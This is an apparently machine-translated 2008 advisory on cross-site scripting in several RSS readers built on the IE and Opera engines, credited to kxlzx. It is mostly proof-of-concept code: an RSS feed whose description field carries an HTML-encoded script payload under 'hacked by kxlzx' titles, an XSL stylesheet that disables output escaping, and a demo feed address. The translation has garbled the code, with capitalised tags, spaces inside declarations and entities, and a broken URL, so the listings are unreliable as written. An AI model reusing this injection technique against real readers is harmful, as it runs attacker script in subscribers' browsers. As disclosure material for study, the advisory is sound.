Multiple RSS readers have XSS vulnerabilities

Affected Systems:

Call the following kernel to parse the RSS feed:

Internet explorer ver <= IE7 (other versions are not tested and are estimated to be available)

OPERA ver <= 9.52

The following reader vulnerabilities:

Sina diantong 1.1.0.8 is currently the highest

Zhou botong 4.0 (28031409) is currently the highest

Travel 2.1.4.443 (currently the highest) RSS sidebar

... Do not list them one by one.

Unaffected system:

GOOGLE's RSS reader, because this RSS reader does not call the IE kernel to parse <description>, but is parsed and output as html.

Description:

IE and OPERA parse the <description> label content under <item> in RSS as follows:

First, use HTML encoding to decrypt the content (for example, '& lt;' is parsed as '<'), and then execute the HTML code.

This resolution method causes some RSS reading tools to filter this out, resulting in an XSS vulnerability.

<* Source: kxlzx (kxlzx@xiaotou.org) http://www.inbreak.net/*>

Test method:
Enter the HTML-encoded JS code in the content of the <description> tag, for example:
Rss. xml Code

<? Xml version = "1.0" encoding = "UTF-8"?> <? Xml-stylesheet href = kxlzx. xsl type = text/xsl?>
<Rss xmlns: atom = "http://www.w3.org/2005/Atom" xmlns: dc = "http://purl.org/dc/elements/1.1"
Xmlns: fs = "http://www.feedsky.com/namespace/feed" xmlns: content = "http://purl.org/rss/1.0/modules/content"
Xmlns: wfw = "http://wellformedweb.org/CommentAPI/" xmlns: trackback = "http://madskills.com/public/xml/rss/module/trackback"
Version = "2.0">
<Channel>
<Update> Mon, 26 Oct 2008 10:36:52 + 0800 </update>
<Title> hacked by kxlzx </title>
<Description> hacked by kxlzx </description>
<Item>
<Title> hacked by kxlzx title </title>
<Author xmlns = "http://www.w3.org/2005/Atom">
<Name> test all </name>
</Author>
<Id xmlns = "http://www.inbreak.net/Http://www.w3.org/2005/Atom> http://www.inbreak.net/</id>
<Description> & lt; script & gt; alert (xss); & lt;/script & gt; </description>
<PubDate> Mon, 27 Oct 2008 09:34:54 + 0800 </pubDate>
</Item>
</Channel>
</Rss>

Kxlzx. xsl code
<? Xml version = "1.0" encoding = "UTF-8"?>
<Xsl: stylesheet xmlns: xsl = "http://www.w3.org/1999/XSL/Transform" version = "1.0">
<Xsl: output method = "html" indent = "yes" doctype-system = "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" doctype-public = "-// W3C // dtd xhtml 1.0 Transitional // EN"/>
<Xsl: variable name = "title" select = "/rss/channel/title"/>
<Xsl: variable name = "feedUrl" select = "/rss/channel/atom: link [@ ref = self]/@ href" xmlns: atom = "http://www.w3.org/2005/Atom"/>
<Xsl: variable name = "srclink" select = "/rss/channel/link"/>
<Xsl: template match = "/">
<Html>
<Head>
<Meta http-equiv = "Content-Type" content = "text/html; charset = UTF-8"/>
</Head>
<Xsl: apply-templates select = "rss/channel"/>
</Html>
</Xsl: template>
<Xsl: template match = "channel">
<Body>
 
<Div id = "wrapper">
<Div id = "content">
<Xsl: apply-templates select = "image"/>
<H1> <a href = "{link}" style = "color: #94B3C5;"> <xsl: value-of select = "$ title"/> </a>  
<P id = "desc"> <xsl: value-of select = "description" disable-output-escaping = "yes"/> </p>
 
<Ul id = "item" class = "item">
<Xsl: apply-templates select = "item"/>
</Ul>
</Div>
</Div>
 
</Body>
</Xsl: template>
<Xsl: template match = "item">
 
<Li>
<H2> <a href = "{link}"> <xsl: value-of select = "title"/> </a> <Span class = "date"> <xsl: value-of select = "pubDate"/> </span>
 
<P name = "decodeable" class = "itemcontent"> <xsl: call-template name = "outputContent"/> </p>
 
<Xsl: if test = "count (child: enclosure) = 1">
<Dd>
<A href = "{enclosure/@ url}">

</A>
</Dd>
</Xsl: if>
 
</Li>
 
</Xsl: template>
<Xsl: template match = "image">
<Xsl: element name = "img" namespace = "http://www.w3.org/1999/xhtml">
<Xsl: attribute name = "src"> <xsl: value-of select = "url"/> </xsl: attribute>
<Xsl: attribute name = "alt">
Link to <xsl: value-of select = "title"/> </xsl: attribute>
<Xsl: attribute name = "id"> feedimage </xsl: attribute>
</Xsl: element>
<Xsl: text> </xsl: text>
</Xsl: template>
<Xsl: template match = "feedsky: browserFriendly" xmlns: feedsky = "http://namespace.org/feedsky/ext/1.0">
<P id = "ownerblurb" xmlns = "http://www.w3.org/1999/xhtml">
<Em> A message from the feed publisher: </em>
<Xsl: text> </xsl: text>
<Xsl: apply-templates/>
</P>
</Xsl: template>
<Xsl: template name = "outputContent">
<Xsl: choose>
<Xsl: when test = "xhtml: body" xmlns: xhtml = "http://www.w3.org/1999/xhtml">
<Xsl: copy-of select = "xhtml: body/*"/>
</Xsl: when>
<Xsl: when test = "xhtml: div" xmlns: xhtml = "http://www.w3.org/1999/xhtml">
<Xsl: copy-of select = "xhtml: div"/>
</Xsl: when>
<Xsl: when test = "content: encoded" xmlns: content = "http://purl.org/rss/1.0/modules/content/">
<Xsl: value-of select = "content: encoded" disable-output-escaping = "yes"/>
</Xsl: when>
<Xsl: when test = "description">
<Xsl: value-of select = "description" disable-output-escaping = "yes"/>
</Xsl: when>
</Xsl: choose>
</Xsl: template>
</Xsl: stylesheet>
Demo address:

Http://www.inbreak.net/kxlzxtest/rss8.xml

Use an RSS reader to subscribe to this address.

Suggestion:

I have no suggestions. I pray that the RSS reader manufacturer has upgraded.

Link: http://www.inbreak.net /? Action = show & id = 132